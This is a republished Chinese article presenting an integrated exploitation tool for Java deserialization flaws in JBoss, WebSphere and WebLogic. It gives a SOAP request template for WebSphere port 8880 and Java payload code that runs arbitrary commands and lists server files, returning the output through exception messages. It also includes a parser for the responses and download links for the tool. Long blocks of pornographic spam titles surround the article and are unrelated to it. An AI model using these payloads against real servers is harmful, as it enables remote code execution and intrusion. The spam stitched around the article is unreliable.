精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Java反序列化集成工具

作者:wooyaa
安全 數據安全
Java反序列化漏洞已經被曝出一段時間了,本人參考了網上大神的放出來的工具,將Jboss、Websphere和weblogic的反序列化漏洞的利用集成到了一起。其實,WebSphere的利用過程也和JBoss差不多,只不過在發送Payload和解析結果的時候多了個Base64編碼(解碼)的過程。

0X00 概述

Java反序列化漏洞已經被曝出一段時間了,本人參考了網上大神的放出來的工具,將Jboss、Websphere和weblogic的反序列化漏洞的利用集成到了一起。其實,WebSphere的利用過程也和JBoss差不多,只不過在發送Payload和解析結果的時候多了個Base64編碼(解碼)的過程。

[[161347]]

本工具暫時支持的功能:

1、本地命令執行并回顯,無須加載外部jar包,支持純內網環境檢測。

2、支持JBoss、WebSphere和Weblogic的反序列化漏洞檢測。

3、支持https數據傳輸。

4、支持文件目錄列表。

0X01 WebSphere的反序列化漏洞利用過程

WebSphere的反序列化漏洞發生的位置在SOAP的通信端口8880,使用的通信協議是https,發送的數據是XML格式的數據。

  1. <?xml version='1.0'encoding='UTF-8'?> 
  2.   <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> 
  3.   <SOAP-ENV:Header xmlns:ns0="admin" ns0:WASRemoteRuntimeVersion="8.5.5.1" ns0:JMXMessageVersion="1.2.0" ns0:SecurityEnabled="true" ns0:JMXVersion="1.2.0"> 
  4.   <LoginMethod>BasicAuth</LoginMethod> 
  5.   </SOAP-ENV:Header> 
  6.   <SOAP-ENV:Body> 
  7.   <ns1:getAttribute xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> 
  8.   <objectname xsi:type="ns1:javax.management.ObjectName">Base64(payload)</objectname> 
  9.   <attribute xsi:type="xsd:string">ringBufferSize</attribute> 
  10.   </ns1:getAttribute> 
  11.   </SOAP-ENV:Body> 
  12.   </SOAP-ENV:Envelope> 

將我們構造的執行命令的payload通過base64編碼后放在objectname節點中,通過https發送到服務器端,服務器端調用相應的執行函數,將結果發送給客戶端,同樣的,返回的數據也是經過base64編碼的。WebSphere的Payload和JBoss的基本一致。如下是執行命令的payload。

  1. public RunCommand(String command) throws Exception  
  2.    {  
  3.            Process proc = Runtime.getRuntime().exec(command);  
  4.            BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));  
  5.            StringBuffer sb = new StringBuffer();  
  6.            String line;  
  7.            while ((line = br.readLine()) != null)  
  8.            {  
  9.                sb.append(line).append("\n");  
  10.            }  
  11.            String result = "\r\n\r\n==========" + sb.toString() + "==========\r\n";  
  12.            br.close();  
  13.            Exception e=new Exception(result);  
  14.            throw e;  
  15.    } 

將命令執行結果以字符隔開,這樣在客戶端獲取數據后,可通過split、substring等方法對命令的執行結果進行解析。解析命令的源碼如下:

  1. public static String parseResult(String result)  
  2.    {  
  3.    String tmp=result.split("<faultstring>")[1];  
  4.    String reString=tmp.split("</faultstring>")[0];  
  5.    String resultTmp=new String(Base64.getDecoder().decode(reString));  
  6.    int x1=resultTmp.indexOf("==========")+10;  
  7.    int x2=resultTmp.lastIndexOf("==========")-1;  
  8.    String returnValue="";  
  9.    if(x1>=0&&x2>=0)  
  10.    returnValue=resultTmp.substring(x1, x2).trim();  
  11.    else  
  12.    returnValue=resultTmp;  
  13.    return returnValue;  
  14.    } 

0X02 文件列表讀取

獲取文件列表的功能是通過Java的listRoot和listFiles來實現的,獲取文件和目錄列表的過程和命令執行大概相同。在這我就簡單的描述一下過程:如果傳入方法的是一個空值,那么就通過Files.listRoot獲取根目錄或者驅動器列表,否則,傳入的值是路徑的話,就通過file.listFiles方法獲取目錄下的所有文件和目錄,將獲取到的目錄名放到{}中,將文件名放在[]中,這樣,就方便我們在程序中對獲取到的數據進行解析。

獲取目錄的payload代碼如下:

  1. public GetFileList(String fileName) throws Exception  
  2.     {  
  3.     StringBuilder sb=new StringBuilder();  
  4.     String result=new String();  
  5.     if(fileName.isEmpty())  
  6.     {  
  7.     File[] files=File.listRoots();  
  8.     for(int i=0;i<files.length;i++)  
  9.     {  
  10.     sb.append(files[i].getAbsolutePath()).append(",");  
  11.     }  
  12.     result="{"+sb.toString().substring(0,sb.toString().length()-1)+"}";  
  13.     }  
  14.     else  
  15.     {  
  16.     File file=new File(fileName);  
  17.     StringBuilder dirList=new StringBuilder();  
  18.     StringBuilder fileList=new StringBuilder();  
  19.     if(file.isDirectory())  
  20.     {  
  21.     File[] list=file.listFiles();  
  22.     dirList.append("{");  
  23.     fileList.append("[");  
  24.     for(int i=0;i<list.length;i++)  
  25.     {  
  26.     if(list[i].isDirectory())  
  27.     dirList.append(list[i].getAbsolutePath()).append(",");  
  28.     else  
  29.     fileList.append(list[i].getAbsolutePath()).append(",");  
  30.     }  
  31.     }  
  32.     if(!dirList.toString().isEmpty())  
  33.     sb.append(dirList.toString().substring(0,dirList.toString().length()-1)).append("}");  
  34.     if(!fileList.toString().isEmpty())  
  35.     sb.append(fileList.toString().substring(0,fileList.toString().length()-1)).append("]");  
  36.     result=sb.toString();  
  37.     }  
  38.     result="\r\n\r\n==========\r\n"+result+"\r\n==========\r\n";  
  39.     Exception e=new Exception(result);  
  40.             throw e;  
  41.     } 

解析的時候,先將執行結果分離出來,再對結果base64解碼,再進一步區分目錄和文件,分別添加到界面的目錄樹中。

注:設計時為了美觀,使用了JavaFX來設計界面,運行時需要JDK1.8環境。

程序運行效果如下:

Java反序列化集成工具

 

工具下載地址:http://pan.baidu.com/s/1sjXjsBz 密碼: b423

2016.1.5 工具更新內容:

地址: http://pan.baidu.com/s/1jGSEFFS 密碼: si6t

1.多線程處理任務,解決命令執行過程中界面無法響應的問題

2.[Bug Fix]weblogic console端口改為80時無法獲取數據

3.[Bug Fix]weblogic第一次獲取信息或執行命令響應時間過長的問題

責任編輯:藍雨淚 來源: FreeBuf
反序列化集成工具反序列化漏洞
相關推薦

2022-08-06 08:41:18

序列化反序列化Hessian

2018-03-19 10:20:23

Java序列化反序列化

2011-06-01 15:05:02

序列化反序列化

2009-06-14 22:01:27

Java對象序列化反序列化

2009-08-24 17:14:08

C#序列化

2016-09-21 00:15:27

2009-08-06 11:16:25

C#序列化和反序列化

2023-12-13 13:49:52

Python序列化模塊

2011-05-18 15:20:13

XML

2021-10-20 07:18:50

Java 序列化漏洞

2010-03-19 15:54:21

Java Socket

2011-06-01 14:50:48

2009-08-25 14:24:36

C#序列化和反序列化

2019-11-20 10:07:23

web安全PHP序列化反序列化

2021-11-18 07:39:41

Json 序列化Vue

2012-04-13 10:45:59

XML

2009-09-09 16:10:11

.NET序列化和反序列

2009-08-25 14:43:26

C#序列化和反序列化

2024-09-10 08:28:22

2024-10-07 08:26:53

點贊
收藏

51CTO技術棧公眾號

欧美电影在线观看免费| www.天堂在线| 欧美精品久久久久久| 色狠狠桃花综合| 日韩av图片| 日韩电影在线观看一区二区| 日本一区二区三区视频| 欧美一区二区三区四区视频| 欧美黑人在线观看| 日本黄色不卡视频| 亚洲激情午夜| 国产午夜精品美女视频明星a级| 91小视频网站| 日本精品600av| www.在线欧美| 国产精品亚洲精品| 久久精品美女视频| 成人区精品一区二区婷婷| 首页国产欧美久久| 日韩在线免费视频| 久久av一区二区三| 国产精品亚洲一区二区三区在线观看| 国产精品美女久久久久久| 99久久久久国产精品免费| 成人毛片在线播放| 欧美影院一区| 亚洲成人免费网站| 成 人 黄 色 小说网站 s色| 国产精品186在线观看在线播放| www激情久久| 亚洲字幕一区二区| 国产成人a v| 一区二区三区网站| 国产亚洲精品综合一区91| 亚洲妇女无套内射精| 国精产品一区二区三区有限公司 | 无码av中文一区二区三区桃花岛| 午夜啪啪免费视频| yw在线观看| 久久久久成人黄色影片| 鲁鲁视频www一区二区| 日本wwwxxxx| 成人激情免费电影网址| 国产厕所精品在线观看| 亚洲第一页视频| 国产成人免费视频网站| 91久久久久久久久久久| 国产乱叫456在线| 激情综合色播五月| 91色中文字幕| 国产熟女一区二区三区五月婷| 精品中文av资源站在线观看| 成人av在线亚洲| 在线观看日韩一区二区| 久久99深爱久久99精品| 国产热re99久久6国产精品| 亚洲手机在线观看| 韩国三级电影一区二区| 亚洲综合在线做性| 二区三区在线视频| proumb性欧美在线观看| 蜜桃日韩视频| av在线收看| 亚洲品质自拍视频| 国产精品啪啪啪视频| 日本理论片午伦夜理片在线观看| 亚洲成人在线观看视频| 国产l精品国产亚洲区久久| 日韩欧美一区二区三区在线观看| 欧美特级限制片免费在线观看| 91日韩视频在线观看| 999精品嫩草久久久久久99| 日韩欧美在线综合网| 少妇激情一区二区三区视频| 亚洲宅男一区| 日韩亚洲第一页| 精品少妇theporn| 欧美亚洲视频| 91久久综合亚洲鲁鲁五月天| 高清乱码毛片入口| 久久久久国产精品免费免费搜索| 一区二区三区免费看| 色呦呦在线免费观看| 欧美日韩亚洲一区二| 亚洲免费看av| 国产成人av毛片| 中文字幕av日韩| 久久久久久久久97| 日韩vs国产vs欧美| 波多野结衣成人在线| 精品亚洲综合| 亚洲一区二区美女| 美女一区二区三区视频| 视频一区在线| 一区二区在线视频| 国产亚洲精品码| 美女网站色91| 精品日本一区二区| 精品国产丝袜高跟鞋| 午夜精品福利一区二区三区av| wwwwxxxx日韩| 久久夜色电影| 美女精品视频一区| 国产成人自拍偷拍| aaa亚洲精品一二三区| 国产麻豆电影在线观看| 国产高清不卡| 精品卡一卡二卡三卡四在线| a级黄色免费视频| 亚洲欧美久久| 99久久精品免费看国产一区二区三区| 成人免费在线视频网| 五月激情六月综合| 99九九99九九九99九他书对| 欧美**vk| 91黄色8090| 亚洲av无码片一区二区三区| 日韩一区二区三区av| 国产又黄又大又粗视频| 欧美91在线|欧美| 精品亚洲一区二区三区在线观看 | 欧美电影《轻佻寡妇》| 91成人在线播放| 老牛影视av牛牛影视av| 18欧美乱大交hd1984| 日韩av片网站| 九九亚洲视频| 欧美一区二区.| 国模无码一区二区三区| 亚洲综合精品自拍| 少妇高潮一69aⅹ| 亚洲精品网址| 91精品免费久久久久久久久| 8888四色奇米在线观看| 色先锋资源久久综合| 538国产视频| 日韩视频免费| 九色一区二区| 草草在线视频| 亚洲国产天堂网精品网站| 久久久久久久久久久久久久免费看 | 日韩视频亚洲视频| 国产99久久久久久免费看| www国产成人免费观看视频 深夜成人网| 日本香蕉视频在线观看| 在线播放一区二区精品视频| 精品综合久久久久久97| 精品人妻一区二区三区蜜桃| 亚洲免费观看高清在线观看| 日本成人xxx| 欧美久久综合| 国产日韩欧美精品| 麻豆mv在线看| 亚洲跨种族黑人xxx| 亚洲欧美另类在线视频| 欧美韩国一区二区| 小明看看成人免费视频| 91成人看片| 国产精品播放| 久草在线资源福利站| 亚洲色图第三页| 一卡二卡在线观看| 亚洲精品五月天| 在线xxxxx| 老鸭窝毛片一区二区三区| 日本日本精品二区免费| 久久婷婷五月综合色丁香| 欧美xxxx18性欧美| 亚洲欧美高清视频| 日韩欧中文字幕| 日本黄区免费视频观看| 国产成人在线视频免费播放| 黄色一级视频在线播放| 亚洲精华一区二区三区| 国产狼人综合免费视频| 在线免费观看污| 亚洲男人av电影| 一本一道精品欧美中文字幕| 亚洲精品欧美二区三区中文字幕| 性生活在线视频| 国产欧美午夜| 一区二区在线高清视频| 国产精品xxx在线观看| 欧美中文在线免费| 国产传媒在线播放| 日韩av综合网| 精品人妻一区二区免费视频| 亚洲欧美久久| 51xx午夜影福利| 免费黄色成人| 91在线观看网站| 伊人久久高清| 久久久久久久久久国产| 国产中文字幕在线| 欧美va亚洲va| 亚洲视频在线观看一区二区| 午夜视黄欧洲亚洲| 很污很黄的网站| 99精品视频一区二区| 91香蕉视频在线观看视频| 日韩一区精品视频| 成品人视频ww入口| 久久精品亚洲欧美日韩精品中文字幕| 国产精品视频入口| 综合欧美精品| 国产精品成久久久久三级| 福利小视频在线| 久久成人人人人精品欧| 九色视频在线播放| 亚洲精品久久久久久久久| 国产三级视频在线播放| 欧美色男人天堂| 可以免费看的av毛片| 夜夜嗨av一区二区三区网页 | 欧洲美女亚洲激情| 久久一区二区三区超碰国产精品| 黄色三级中文字幕| 亚洲精品国产偷自在线观看| 亚洲春色在线视频| 久久av中文| 久久久久久久久久码影片| 51亚洲精品| 97国产超碰| 国产精品一区二区三区www| 国产精品美女久久久免费| 国产免费不卡| 国产91ⅴ在线精品免费观看| 91jq激情在线观看| 欧美激情免费在线| 四虎亚洲成人| 欧美理论片在线观看| v天堂福利视频在线观看| 久久韩国免费视频| 免费av网站在线看| 日韩视频第一页| 久草免费在线观看| 久久久久www| a天堂中文在线官网在线| 久久精品亚洲精品| 麻豆传媒在线观看| 欧美成人小视频| aaa大片在线观看| 欧美另类交人妖| 色综合999| 97精品一区二区三区| 黄在线观看免费网站ktv| 亚州成人av在线| 午夜激情在线播放| 日本韩国在线不卡| 成人在线视频播放| 国产日韩欧美影视| 国产日韩欧美中文在线| 99热国产免费| 欧美日韩一区二区三区在线电影| 久久66热这里只有精品| 伊人久久大香线蕉综合网蜜芽| 欧美一区二区三区在线播放 | 日韩免费成人| 国产伦精品一区二区三区免| 日本亚洲不卡| 日本在线观看一区二区三区| 日韩激情图片| 91精品国产吴梦梦| 国产欧美日韩亚洲一区二区三区| 成人在线观看a| 六月丁香婷婷久久| 亚洲妇女无套内射精| 99久久精品国产精品久久| 国产精品高清无码在线观看| 国产精品福利一区| 久久精品这里只有精品| 欧美日韩免费观看中文| 中文字幕第一页在线播放| 制服丝袜av成人在线看| 手机在线观看免费av| 亚洲丝袜一区在线| a篇片在线观看网站| 97av视频在线| 精品美女一区| 国产精品亚洲综合| 欧美亚洲在线日韩| 毛片在线视频观看| 老鸭窝毛片一区二区三区| 一级片免费在线观看视频| www.亚洲人| 来吧亚洲综合网| 午夜久久久久久电影| 中文字幕人妻一区二区在线视频 | 黄色的视频在线免费观看| 日韩一区二区三区国产| 91超碰在线免费| 国产在线久久久| 亚洲精品白浆高清| 中文字幕在线中文| 日韩高清欧美激情| 中文字幕在线永久| 亚洲欧美日韩电影| 亚洲 国产 日韩 欧美| 日韩免费高清视频| 尤物网址在线观看| 欧美做受高潮1| 亚洲国产高清在线观看| 亚洲第一在线综合在线| 亚洲毛片网站| 在线观看免费看片| 国产精品天天摸av网| 在线能看的av| 精品国产一区二区在线观看| 91.xxx.高清在线| 国产成人拍精品视频午夜网站 | 国产一区999| 色撸撸在线视频| 狠狠躁夜夜躁久久躁别揉| 亚洲第一精品网站| 久久这里有精品| 久久免费资源| 亚洲欧美日产图| 久久久蜜桃一区二区人| 第四色在线视频| 亚洲国产成人av网| 午夜精品久久久久久久爽| xxxxxxxxx欧美| 成人看片毛片免费播放器| 日本不卡二区| 久久伊人亚洲| 91久久免费视频| 欧美性猛交xxxx久久久| 精品视频在线观看免费| 欧美精品tushy高清| 福利在线播放| 国产精品久久视频| 精品国产一区二区三区香蕉沈先生| 国产最新免费视频| 91啪亚洲精品| 日韩激情在线播放| 亚洲国产精品成人一区二区| 日本片在线看| 国产一区精品在线| 亚洲第一毛片| 天天插天天射天天干| 精品免费在线观看| 婷婷亚洲一区二区三区| 欧洲成人在线视频| 九九综合在线| 中文字幕天天干| 中文字幕在线观看不卡| 国产精品国产一区二区三区四区 | 国产成人午夜高潮毛片| 国产suv一区二区三区| 日韩精品一区二区三区蜜臀 | 秋霞午夜鲁丝一区二区| 亚洲最色的网站| 丰满人妻一区二区三区无码av | 日本熟妇毛耸耸xxxxxx| 亚洲国产一区二区三区四区| 免费看男女www网站入口在线| 久久99精品国产99久久| 另类图片国产| 蜜桃av免费观看| 日韩一区二区在线观看视频| 福利在线导航136| 日本一区美女| 极品少妇一区二区三区精品视频| 中文字幕手机在线观看| 精品毛片乱码1区2区3区| 九色porny丨国产首页在线| 先锋影音一区二区三区| 国内精品免费在线观看| 国产精品99re| 亚洲香蕉伊综合在人在线视看| 狂野欧美性猛交xxxx| 欧美日韩视频免费| 久久久亚洲高清| 国产原创中文av| 98精品国产高清在线xxxx天堂| 综合国产视频| 日本精品一区在线| 亚洲777理论| 在线免费看av| 国产日韩欧美一区二区三区四区| 日韩国产精品久久| 国产一二三四在线| 中文字幕日韩av| 粉嫩精品导航导航| 中文字幕国产传媒| 亚洲国产日韩精品| av在线免费观看网站| 国产欧美一区二区三区另类精品| 奇米色一区二区三区四区| 伊人365影院| 日韩在线高清视频| 西瓜成人精品人成网站| 污污网站在线观看视频| 欧美视频不卡中文| 99福利在线| 亚洲.欧美.日本.国产综合在线| 高清成人免费视频| 91福利在线观看视频| 日本精品在线视频 | 日本老熟妇毛茸茸|